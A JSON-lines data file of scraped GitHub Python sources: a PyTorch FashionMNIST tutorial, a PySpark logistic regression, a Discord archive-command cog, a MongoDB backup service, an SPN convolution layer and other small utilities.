+{"seq_id":"36256509533","text":"import torch\r\nfrom torch import nn\r\nfrom torch.utils.data import DataLoader\r\nfrom torchvision import datasets\r\nfrom torchvision.transforms import ToTensor, Lambda, Compose\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\n\r\n# dataset\r\n# dataloader\r\n# hyperparameter\r\n# NeuralNet 정의\r\n# Model 선언\r\n# Loss function, optimizer\r\n# training 및 test 코드\r\n\r\n\r\n\r\n # 모든 TorchVision Dataset은 샘플과 정답을 각각 변경하기 위한 transform과 target_transform 두 인자를 포함한다.\r\n\r\n# Training dataset download\r\ntraining_data = datasets.FashionMNIST(root=\"data\", train=True, download=True, transform=ToTensor())\r\n# Test dataset download\r\ntest_data = datasets.FashionMNIST(root=\"data\", train=False, download=True, transform=ToTensor())\r\n\r\n # Dataset을 DataLoader의 인자로 전달한다.\r\n # Dataset을 iterable로 감싸고, batch, sampling, shuffle 및 multiprocessing data loading 을 지원.\r\n\r\nbatch_size = 64\r\n\r\n# Create DataLoader\r\ntrain_dataloader = DataLoader(training_data, batch_size=batch_size)\r\ntest_dataloader = DataLoader(test_data, batch_size=batch_size)\r\n\r\nfor X, y in test_dataloader:\r\n print(\"Shape of X [N(batch), C, H, W]: \", X.shape)\r\n print(\"Shape of y: \", y.shape, y.dtype)\r\n break\r\n\r\n# Making Model\r\n'''\r\n - 모델은 nn.Module을 상속받는 class를 생성하여 정의함.\r\n - __init__ 함수에서 layer들을 정의\r\n - forward 함수에서 데이터를 어떻게 전달할지 지정함.\r\n'''\r\n\r\ndevice = \"cuda\" if torch.cuda.is_available() else 'cpu'\r\nprint(\"using {} device\".format(device))\r\n\r\n\r\n# Define model\r\nclass NeuralNetwork(nn.Module):\r\n def __init__(self):\r\n super(NeuralNetwork, self).__init__()\r\n self.flatten = nn.Flatten()\r\n self.linear_relu_stack = nn.Sequential(\r\n nn.Linear(28*28, 512),\r\n nn.ReLU(),\r\n nn.Linear(512, 512),\r\n nn.ReLU(),\r\n nn.Linear(512, 10),\r\n nn.ReLU()\r\n )\r\n\r\n def forward(self, x):\r\n x = self.flatten(x)\r\n logits = self.linear_relu_stack(x)\r\n return logits\r\n\r\n\r\nmodel = NeuralNetwork().to(device)\r\nprint(model)\r\n\r\nloss_fn = nn.CrossEntropyLoss()\r\noptimizer = torch.optim.SGD(model.parameters(), lr=1e-3)\r\n\r\ndef train(dataloader, model, loss_fn, optimizer):\r\n size = len(dataloader.dataset)\r\n for batch, (X, y) in enumerate(dataloader):\r\n X, y = X.to(device), y.to(device)\r\n\r\n pred = model(X)\r\n loss = loss_fn(pred, y)\r\n\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n if batch % 100 == 0:\r\n loss, current = loss.item(), batch * len(X)\r\n print(f\"Loss : {loss:>7f} [{current:>5d}/{size:>5d}]\")\r\n\r\n\r\ndef test(dataloader, model, loss_fn):\r\n size = len(dataloader.dataset)\r\n num_batches = len(dataloader)\r\n model.eval()\r\n test_loss, correct = 0, 0\r\n with torch.no_grad():\r\n for X, y in dataloader:\r\n X, y = X.to(device), y.to(device)\r\n pred = model(X)\r\n test_loss += loss_fn(pred, y).item()\r\n correct += (pred.argmax(1) == y).type(torch.float).sum().item()\r\n test_loss /= num_batches\r\n correct /= size\r\n print(f\"Test error: \\n Accuracy: {(100*correct):>0.1f}%, Avg loss: {test_loss:>8f} \\n\")\r\n\r\n\r\nepochs = 5\r\nfor t in tqdm(range(epochs)):\r\n print(f\"Epoch {t+1}\\n---------------------------------\")\r\n train(train_dataloader, model, loss_fn, optimizer)\r\n test(test_dataloader, model, loss_fn)\r\n\r\nprint(\"Done!\")\r\n\r\ntorch.save(model.state_dict(), \"model.pth\")\r\nprint(\"Saved PyTorch Model State to model.pth\")\r\n\r\nmodel = NeuralNetwork()\r\nmodel.load_state_dict(torch.load(\"model.pth\"))\r\nclasses = [\r\n \"T-shirt/top\",\r\n \"Trouser\",\r\n \"Pullover\",\r\n \"Dress\",\r\n \"Coat\",\r\n \"Sandal\",\r\n \"Shirt\",\r\n \"Sneaker\",\r\n \"Bag\",\r\n \"Ankle boot\",\r\n]\r\nmodel.eval()\r\nx, y = test_data[0][0], test_data[0][1]\r\nwith torch.no_grad():\r\n pred = model(x)\r\n predicted, actual = classes[pred[0].argmax(0)], classes[y]\r\n print(f'Predicted : \"{predicted}\", Actual : \"{actual}\"')","repo_name":"scyonggg/2021_2_CAPSTONE","sub_path":"format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"23598660828","text":"\"\"\"\n@file : 003-logistic_regression_use_pyspark.py\n@author : xiaolu\n@email : luxiaonlp@163.com\n@time : 2021-04-08\n\"\"\"\nimport findspark\nfindspark.init()\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.ml.feature import StringIndexer\nfrom pyspark.ml.feature import VectorAssembler\nfrom pyspark.ml.feature import OneHotEncoder\nfrom pyspark.ml.classification import LogisticRegression\nfrom pyspark.ml.evaluation import BinaryClassificationEvaluator\n\n\ndef analyse_data(df):\n '''\n 数据分析\n :param df:\n :return:\n '''\n # 打印数据的格式\n print(df.printSchema())\n\n # 打印前五条数据\n print(df.show(n=5))\n\n # 简单看一下各个特征的统计指标\n print(df.describe().show()) # 对于离散值 是不计算均值和方差的\n\n # 按国家特征进行聚合 看看那个国家样本多\n print(df.groupby('Country').count().show())\n\n # 看看搜索引擎用户数量谁最高\n print(df.groupby('Platform').count().show())\n\n\ndef feature_process(df):\n '''\n 特征工程\n :param df:\n :return:\n '''\n # 这里需要将国家和搜索引擎两个特征转为数值特征\n search_engine_indexer = StringIndexer(inputCol=\"Platform\", outputCol='Platform_Num').fit(df)\n df = search_engine_indexer.transform(df)\n # print(df.show(3))\n search_engine_encoder = OneHotEncoder(inputCol='Platform_Num', outputCol='Platform_Num_Vec').fit(df)\n df = search_engine_encoder.transform(df)\n # print(df.show(3))\n\n # print('*'*150)\n # 然后处理国家特征\n country_indexer = StringIndexer(inputCol=\"Country\", outputCol='Country_Num').fit(df)\n df = country_indexer.transform(df)\n # print(df.show(3))\n country_encoder = OneHotEncoder(inputCol='Country_Num', outputCol='Country_Num_Vec').fit(df)\n df = country_encoder.transform(df)\n # print(df.show(3))\n\n df_assembler = VectorAssembler(\n inputCols=['Platform_Num_Vec', 'Country_Num_Vec', 'Age', 'Repeat_Visitor', 'Web_pages_viewed'],\n outputCol='features'\n )\n df = df_assembler.transform(df)\n model_df = df.select(['features', 'Status'])\n return model_df\n\n\nif __name__ == \"__main__\":\n # 1. 加载数据\n spark = SparkSession.builder.appName('log_reg').getOrCreate()\n df = spark.read.csv('./data/Log_Reg_dataset.csv', inferSchema=True, header=True)\n # print('样本数:{}, 特征数:{}'.format(df.count(), len(df.columns))) # 样本数:20000, 特征数:6\n\n # 2. 数据分析\n # analyse_data(df)\n\n # 3. 特征工程\n model_df = feature_process(df)\n # print(model_df.show(3))\n # 切分数据集\n training_df, test_df = model_df.randomSplit([0.75, 0.25])\n print('训练集的个数:', training_df.count())\n print('测试集的个数:', test_df.count())\n\n print('训练集的正负样本比例:')\n print(training_df.groupBy('Status').count().show())\n\n print('测试集的正负样本比例:')\n print(test_df.groupBy('Status').count().show())\n\n # 4. 训练模型\n log_reg = LogisticRegression(labelCol='Status').fit(training_df)\n\n # 5. 测试模型\n train_results = log_reg.evaluate(training_df).predictions\n correct_preds = train_results.filter(train_results['Status'] == 1).filter(train_results['prediction'] == 1).count()\n print('训练集的正确率:', float(correct_preds)/(training_df.filter(training_df['Status'] == 1).count()))\n\n # 在测试集上的表现\n results = log_reg.evaluate(test_df).predictions\n # 计算混淆矩阵\n true_postives = results[(results.Status == 1) & (results.prediction == 1)].count()\n true_negatives = results[(results.Status == 0) & (results.prediction == 0)].count()\n false_positives = results[(results.Status == 0) & (results.prediction == 1)].count()\n false_negatives = results[(results.Status == 1) & (results.prediction == 0)].count()\n recall = float(true_postives)/(true_postives + false_negatives)\n print('召回率:', recall)\n\n precision = float(true_postives) / (true_postives + false_positives)\n print('精确率:', precision)\n\n accuracy = float((true_postives+true_negatives) /(results.count()))\n print('准确率:', accuracy)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"shawroad/Python-Library-Learning","sub_path":"PySpark/003-logistic_regression_use_pyspark.py","file_name":"003-logistic_regression_use_pyspark.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"38"} +{"seq_id":"21369083919","text":"import numpy as np\nfrom generators import arma, toFile\n\n##########\n# ARMA A #\n##########\n# normally-distributed noise with 0 loc, 1 scale\n\nseconds = np.arange(100)\n\nslags = [0.4, 0.2]\nnlags = [0.3, 0.2, 0.1]\nsignal0, _ = arma(slags, nlags, seconds)\nslags = [0.5, 0.3]\nnlags = [0.1, 0.05, 0.01]\nsignal1, _ = arma(slags, nlags, seconds)\n\nout = np.zeros((len(seconds), 3))\nout[:, 0] = seconds\nout[:, 1] = signal0\nout[:, 2] = np.exp(signal1)\ntoFile(out, 'LogARMA', pivotName='seconds')\n","repo_name":"idaholab/raven","sub_path":"tests/framework/ROM/TimeSeries/SyntheticHistory/TrainingData/generateLogARMA.py","file_name":"generateLogARMA.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"38"} +{"seq_id":"20258966645","text":"from typing import Any, Dict, List, Optional, Union\n\nfrom sqlalchemy import select\nfrom sqlalchemy.orm import selectinload\n\nfrom labfunctions.models import HistoryModel\nfrom labfunctions.types import (\n ExecutionResult,\n HistoryLastResponse,\n HistoryResult,\n NBTask,\n)\n\n\ndef select_history():\n\n stmt = select(HistoryModel).options(selectinload(HistoryModel.project))\n return stmt\n\n\nasync def get_last(\n session, projectid: str, wfid: Optional[str] = None, limit=1\n) -> Union[HistoryLastResponse, None]:\n if wfid:\n stmt = (\n select(HistoryModel)\n .where(HistoryModel.wfid == wfid)\n .where(HistoryModel.project_id == projectid)\n .order_by(HistoryModel.created_at.desc())\n .limit(limit)\n )\n else:\n stmt = (\n select(HistoryModel)\n .where(HistoryModel.project_id == projectid)\n .order_by(HistoryModel.created_at.desc())\n .limit(limit)\n )\n\n r = await session.execute(stmt)\n results = r.scalars()\n if not results:\n return None\n\n rsp = []\n for r in results:\n rsp.append(\n HistoryResult(\n wfid=r.wfid,\n execid=r.execid,\n status=r.status,\n result=r.result,\n created_at=r.created_at.isoformat(),\n )\n )\n return HistoryLastResponse(rows=rsp)\n\n\nasync def get_one(session, execid: str) -> Union[HistoryResult, None]:\n stmt = select(HistoryModel).where(HistoryModel.execid == execid).limit(1)\n r = await session.execute(stmt)\n model: Union[HistoryModel, None] = r.scalar_one_or_none()\n hr = None\n if model:\n hr = HistoryResult(\n wfid=model.wfid,\n execid=model.execid,\n status=model.status,\n result=model.result,\n created_at=model.created_at.isoformat(),\n )\n return hr\n\n\nasync def create(session, execution_result: ExecutionResult) -> HistoryModel:\n result_data = execution_result.dict()\n\n status = 0\n if execution_result.error:\n status = -1\n\n row = HistoryModel(\n wfid=execution_result.wfid,\n execid=execution_result.execid,\n project_id=execution_result.projectid,\n elapsed_secs=execution_result.elapsed_secs,\n nb_name=execution_result.name,\n result=result_data,\n status=status,\n )\n session.add(row)\n return row\n","repo_name":"nuxion/labfunctions","sub_path":"labfunctions/managers/history_mg.py","file_name":"history_mg.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"} +{"seq_id":"25762957","text":"\"\"\"Contains cog classes for any archival interactions.\"\"\"\n\nimport logging\nimport re\n\nimport discord\n\nfrom exceptions import BaseDoesNotExistError, UserNotInCSSDiscordServer\nfrom utils import (\n CommandChecks,\n TeXBotApplicationContext,\n TeXBotAutocompleteContext,\n TeXBotBaseCog,\n)\n\n\nclass ArchiveCommandCog(TeXBotBaseCog):\n \"\"\"Cog class that defines the \"/archive\" command and its call-back method.\"\"\"\n\n @staticmethod\n async def autocomplete_get_categories(ctx: TeXBotAutocompleteContext) -> set[discord.OptionChoice]: # noqa: E501\n \"\"\"\n Autocomplete callable that generates the set of available selectable categories.\n\n The list of available selectable categories is unique to each member, and is used in\n any of the \"archive\" slash-command options that have a category input-type.\n \"\"\"\n if not ctx.interaction.user:\n return set()\n\n try:\n css_guild: discord.Guild = ctx.bot.css_guild\n interaction_user: discord.Member = await ctx.bot.get_css_user(ctx.interaction.user)\n assert await ctx.bot.check_user_has_committee_role(interaction_user)\n except (AssertionError, BaseDoesNotExistError, UserNotInCSSDiscordServer):\n return set()\n\n return {\n discord.OptionChoice(name=category.name, value=str(category.id))\n for category\n in css_guild.categories\n if category.permissions_for(interaction_user).is_superset(\n discord.Permissions(send_messages=True, view_channel=True)\n )\n }\n\n @discord.slash_command( # type: ignore[no-untyped-call, misc]\n name=\"archive\",\n description=\"Archives the selected category.\"\n )\n @discord.option( # type: ignore[no-untyped-call, misc]\n name=\"category\",\n description=\"The category to archive.\",\n input_type=str,\n autocomplete=discord.utils.basic_autocomplete(autocomplete_get_categories), # type: ignore[arg-type]\n required=True,\n parameter_name=\"str_category_id\"\n )\n @CommandChecks.check_interaction_user_has_committee_role\n @CommandChecks.check_interaction_user_in_css_guild\n async def archive(self, ctx: TeXBotApplicationContext, str_category_id: str) -> None:\n \"\"\"\n Definition & callback response of the \"archive\" command.\n\n The \"archive\" command hides a given category from view of casual members unless they\n have the \"Archivist\" role.\n \"\"\"\n # NOTE: Shortcut accessors are placed at the top of the function, so that the exceptions they raise are displayed before any further errors may be sent\n css_guild: discord.Guild = self.bot.css_guild\n interaction_member: discord.Member = await self.bot.get_css_user(ctx.user)\n committee_role: discord.Role = await self.bot.committee_role\n guest_role: discord.Role = await self.bot.guest_role\n member_role: discord.Role = await self.bot.member_role\n archivist_role: discord.Role = await self.bot.archivist_role\n everyone_role: discord.Role = await self.bot.get_everyone_role()\n\n if not re.match(r\"\\A\\d{17,20}\\Z\", str_category_id):\n await self.send_error(\n ctx,\n message=f\"{str_category_id!r} is not a valid category ID.\"\n )\n return\n\n category_id: int = int(str_category_id)\n\n category: discord.CategoryChannel | None = discord.utils.get(\n css_guild.categories,\n id=category_id\n )\n if not category:\n await self.send_error(\n ctx,\n message=f\"Category with ID {str(category_id)!r} does not exist.\"\n )\n return\n\n if \"archive\" in category.name:\n await ctx.respond(\n (\n \":information_source: No changes made. \"\n \"Category has already been archived. :information_source:\"\n ),\n ephemeral=True\n )\n return\n\n # noinspection PyUnreachableCode\n channel: (\n discord.VoiceChannel\n | discord.StageChannel\n | discord.TextChannel\n | discord.ForumChannel\n | discord.CategoryChannel\n )\n for channel in category.channels:\n try:\n channel_needs_committee_archiving: bool = (\n channel.permissions_for(committee_role).is_superset(\n discord.Permissions(view_channel=True)\n ) and not channel.permissions_for(guest_role).is_superset(\n discord.Permissions(view_channel=True)\n )\n )\n channel_needs_normal_archiving: bool = channel.permissions_for(\n guest_role\n ).is_superset(\n discord.Permissions(view_channel=True)\n )\n if channel_needs_committee_archiving:\n await channel.set_permissions(\n everyone_role,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\",\n view_channel=False\n )\n await channel.set_permissions(\n guest_role,\n overwrite=None,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\"\n )\n await channel.set_permissions(\n member_role,\n overwrite=None,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\"\n )\n await channel.set_permissions(\n committee_role,\n overwrite=None,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\"\n )\n\n elif channel_needs_normal_archiving:\n await channel.set_permissions(\n everyone_role,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\",\n view_channel=False\n )\n await channel.set_permissions(\n guest_role,\n overwrite=None,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\"\n )\n await channel.set_permissions(\n member_role,\n overwrite=None,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\"\n )\n await channel.set_permissions(\n committee_role,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\",\n view_channel=False\n )\n await channel.set_permissions(\n archivist_role,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\",\n view_channel=True\n )\n\n else:\n await self.send_error(\n ctx,\n message=f\"Channel {channel.mention} had invalid permissions\"\n )\n logging.error(\n \"Channel %s had invalid permissions, so could not be archived.\",\n channel.name\n )\n return\n\n except discord.Forbidden:\n await self.send_error(\n ctx,\n message=(\n \"Bot does not have access to the channels in the selected category.\"\n )\n )\n logging.error(\n (\n \"Bot did not have access to the channels in the selected category: \"\n \"%s.\"\n ),\n category.name\n )\n return\n\n await ctx.respond(\"Category successfully archived\", ephemeral=True)\n","repo_name":"CSSUoB/TeX-Bot-Py-V2","sub_path":"cogs/archive.py","file_name":"archive.py","file_ext":"py","file_size_in_byte":8276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"43302735820","text":"\"\"\"Сервис для осуществления бэкапов и восстановлений.\"\"\"\nimport logging\nfrom pathlib import Path\nfrom typing import ClassVar, Iterable, cast\n\nimport aiofiles\nimport bson\nfrom motor.motor_asyncio import AsyncIOMotorClient\n\nfrom poptimizer.core import consts, domain\n\n\nclass Service:\n \"\"\"Сервис для осуществления бэкапов и восстановлений.\"\"\"\n\n _dump: ClassVar = consts.ROOT_PATH / \"dump\"\n\n def __init__(self, mongo_client: AsyncIOMotorClient) -> None:\n self._logger = logging.getLogger(\"Backup\")\n self._mongo = mongo_client\n\n async def backup(self, groups: Iterable[domain.Group]) -> None:\n \"\"\"Делает резервную копию группы объектов.\"\"\"\n for group in groups:\n await self._backup(group)\n self._logger.info(f\"backup of {group} completed\")\n\n async def restore(self, groups: Iterable[domain.Group]) -> None:\n \"\"\"Восстанавливает резервную копию группы объектов при отсутствии данных в MongoDB.\"\"\"\n for group in groups:\n if await self._mongo[group.module][group.group].count_documents({}):\n continue\n\n await self._restore(group)\n self._logger.info(f\"initial {group} created\")\n\n def _backup_path(self, group: domain.Group) -> Path:\n path = self._dump / group.module / f\"{group.group}.bson\"\n\n return cast(Path, path)\n\n async def _backup(self, group: domain.Group) -> None:\n path = self._backup_path(group)\n path.parent.mkdir(parents=True, exist_ok=True)\n\n async with aiofiles.open(path, \"bw\") as backup_file:\n async for batch in self._mongo[group.module][group.group].find_raw_batches():\n await backup_file.write(batch)\n\n async def _restore(self, group: domain.Group) -> None:\n path = self._backup_path(group)\n if not path.exists():\n self._logger.warning(f\"backup file for {group} don't exists\")\n\n return\n\n async with aiofiles.open(path, \"br\") as backup_file:\n raw = await backup_file.read()\n\n collection = self._mongo[group.module][group.group]\n\n await collection.insert_many(bson.decode_all(raw))\n","repo_name":"WLM1ke/poptimizer","sub_path":"poptimizer/core/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":146,"dataset":"github-code","pt":"38"} +{"seq_id":"37518638797","text":"from libspn.inference.type import InferenceType\nimport libspn.utils as utils\nimport tensorflow as tf\nfrom libspn.exceptions import StructureError\nfrom libspn.log import get_logger\nfrom libspn.graph.op.conv_products import ConvProducts\n\n\n@utils.register_serializable\nclass ConvProductsDepthwise(ConvProducts):\n \"\"\"A container representing convolutional products in an SPN.\n\n Args:\n *values (input_like): Inputs providing input values to this container.\n See :meth:`~libspn.Input.as_input` for possible values.\n num_channels (int): Number of channels modeled by this node. This parameter is optional.\n If ``None``, the layer will attempt to generate all possible permutations of channels\n under a patch as long as it is under ``num_channels_max``.\n padding (str): Type of padding used. Can be either, 'full', 'valid' or 'wicker_top'.\n For building Wicker CSPNs, 'full' padding is necessary in all but the very last\n ConvProducts node. The last ConvProducts node should take the 'wicker_top' padding algorithm\n dilation_rate (int or tuple of ints): Dilation rate of the convolution.\n strides (int or tuple of ints): Strides used for the convolution.\n spatial_dim_sizes (list or tuple of ints): Dim sizes of spatial dimensions (height and width)\n num_channels_max (int): The maximum number of channels when automatically generating\n permutations.\n name (str): Name of the container.\n\n Attributes:\n inference_type(InferenceType): Flag indicating the preferred inference\n type for this container that will be used\n during value calculation and learning.\n Can be changed at any time and will be\n used during the next inference/learning\n op generation.\n \"\"\"\n\n logger = get_logger()\n\n def __init__(self, *values, padding='valid', dilation_rate=1,\n strides=2, kernel_size=2, inference_type=InferenceType.MARGINAL,\n name=\"ConvProductsDepthwise\", spatial_dim_sizes=None):\n super().__init__(\n *values, inference_type=inference_type, name=name, spatial_dim_sizes=spatial_dim_sizes,\n strides=strides, kernel_size=kernel_size, padding=padding, dilation_rate=dilation_rate)\n self._num_channels = self._num_input_channels()\n\n @utils.lru_cache\n def _compute_log_value(self, *input_tensors):\n # Concatenate along channel axis\n concat_inp = self._prepare_convolutional_processing(*input_tensors)\n\n # This the quickest workaround for TensorFlow's apparent optimization whenever\n # part of the kernel computation involves a -inf:\n concat_inp = tf.where(\n tf.is_inf(concat_inp), tf.fill(tf.shape(concat_inp), value=-1e20), concat_inp)\n # Convolve\n conv_out = tf.nn.conv2d(\n input=self._channels_to_batch(concat_inp),\n filter=tf.ones(self._kernel_size + [1, 1]),\n padding='VALID',\n strides=[1] + self._strides + [1],\n dilations=[1] + self._dilation_rate + [1],\n data_format='NHWC'\n )\n conv_out = self._batch_to_channels(conv_out)\n return self._flatten(conv_out)\n\n @utils.lru_cache\n def _channels_to_batch(self, t):\n gd = t.shape.as_list()[1:3]\n return tf.reshape(self._transpose_channel_last_to_first(t), [-1] + gd + [1])\n\n @utils.lru_cache\n def _batch_to_channels(self, t):\n gd = t.shape.as_list()[1:3]\n return self._transpose_channel_first_to_last(tf.reshape(t, [-1, self._num_channels] + gd))\n\n def _compute_mpe_path_common(self, counts, *input_values):\n if not self._values:\n raise StructureError(\"{} is missing input values.\".format(self))\n # Concatenate inputs along channel axis, should already be done during forward pass\n inp_concat = self._prepare_convolutional_processing(*input_values)\n spatial_counts = tf.reshape(counts, (-1,) + self.output_shape_spatial)\n\n inp_concat = self._channels_to_batch(inp_concat)\n spatial_counts = self._channels_to_batch(spatial_counts)\n\n input_counts = tf.nn.conv2d_backprop_input(\n input_sizes=tf.shape(inp_concat),\n filter=tf.ones(self._kernel_size + [1, 1]),\n out_backprop=spatial_counts,\n strides=[1] + self._strides + [1],\n padding='VALID',\n dilations=[1] + self._dilation_rate + [1],\n data_format=\"NHWC\")\n\n input_counts = self._batch_to_channels(input_counts)\n\n # In case we have explicitly padded the tensor before forward convolution, we should\n # slice the counts now\n pad_left, pad_right, pad_top, pad_bottom = self.pad_sizes()\n if not any([pad_left, pad_right, pad_top, pad_bottom]):\n return self._split_to_children(input_counts)\n return self._split_to_children(input_counts[:, pad_top:-pad_bottom, pad_left:-pad_right, :])\n\n","repo_name":"pronobis/libspn","sub_path":"libspn/graph/op/conv_products_depthwise.py","file_name":"conv_products_depthwise.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"38"} +{"seq_id":"73452135152","text":"from myparser import MyParser\n\nif __name__ == \"__main__\":\n parser = MyParser()\n while True:\n # getting input and parse while 'ctrl+d' pressed\n try:\n s = input('Input Exp >>>> ')\n except EOFError:\n break\n if not s:\n continue\n result = parser.parse(s)\n print(f\"Result Is -> { {result} }\\n\")\n","repo_name":"Hame-daani/Compiler-project","sub_path":"code/Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}